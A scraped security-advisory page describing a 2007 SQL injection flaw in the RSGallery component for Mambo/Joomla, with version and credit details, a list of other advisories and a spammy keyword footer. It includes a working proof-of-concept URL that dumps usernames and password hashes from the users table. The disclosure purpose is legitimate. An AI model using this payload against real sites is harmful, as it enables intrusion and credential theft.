exploits , vulnerabilities , articles , Mambo/Joomla! RSGallery CATID Parameter SQL Injection Vulnerability

Title	Mambo/Joomla! RSGallery CATID Parameter SQL Injection Vulnerability
Published	2007-12-05-12:00AM
Updated	2008-03-03-10:22PM
Class	Input Validation Error
CVE
Remote	Yes
Local	No
Credit	K-159 is credited with the discovery of this vulnerability.
Vulnerable	RSGallery2 RsGallery 2.0 beta 5
Not Vulnerable	RSGallery2 RsGallery2 1.14.3 RSGallery2 RsGallery2 1.11.2
Code	Attackers can use a browser to exploit this issue.The following proof-of-concept URI is available:http://www.example.com/index.php?option=com_rsgallery&page=inline&catid=-1%20union%20select%201,2,3,4,concat(username,0x3a,password),6,7,8,9,10,11%20from%20mos_users--
TXT

Vulnerabilities - newest 10 RSS | More

2009-12-17 GNU Automake Insecure Directory Permissions Vulnerability
2009-12-17 Mozilla Firefox CVE-2009-3979 Multiple Remote Memory Corruption Vulnerabilities
2009-12-17 Mozilla Firefox CVE-2009-3981 Remote Memory Corruption Vulnerability
2009-12-17 Drupal Sections Module HTML Injection Vulnerability
2009-12-17 Mozilla Firefox and SeaMonkey Theora Video Library Remote Integer Overflow Vulnerability
2009-12-17 Mozilla Firefox and Sea Monkey Insecure Protocol Location Bar Spoofing Vulnerability
2009-12-17 Mozilla Firefox and Sea Monkey Content Injection Spoofing Vulnerability
2009-12-17 Mozilla Firefox/SeaMonkey GeckoActiveXObject Exception Message COM Object Enumeration Vulnerability
2009-12-16 ZABBIX Denial Of Service and SQL Injection Vulnerabilities
2009-12-16 IBM WebSphere Application Server JNDI Remote Information Disclosure Vulnerability

SECURITY RSS FEEDS

Advertising

Copyright 2007, SecurityDot
Thu, 17 Dec 2009 17:53:26 +0000

Friends : milw0rm.com , secunia.com , securityfocus.com
GOOGLE
NEWS EXPLOITS VULNS
exploits , 0day exploits , newest exploits , vulnerabilities , newest vulnerabilities , 0day vulnerabilities , newest articles , linux articles , articles
Crack Data fuckvi openssh gs www.babese www.mbtsho php-nuke 2 zhenyulu.c aishwaria vBulletin Invision P achsuthan serv-u v4. WU-FTPD 6. news for C adult vids Mini File FREE PREET www.52778. iicejyrony omariun FREE PREET yaBB sp 1. apache 1.3 NUribaba news for c video site MELAYUBOLE easy galax SOLDIER BO sex videos Kernel 2.6 cybersourc Www.gay se www.warez. www.youtob PHOTO GIRL bebek vide Sania in s licence ka Sex Nayant www.nopopu /search/ex free sexy 500 maxcpm.inf bebek vide hellboundh Dewi persi phpbb 2.0. phpBB por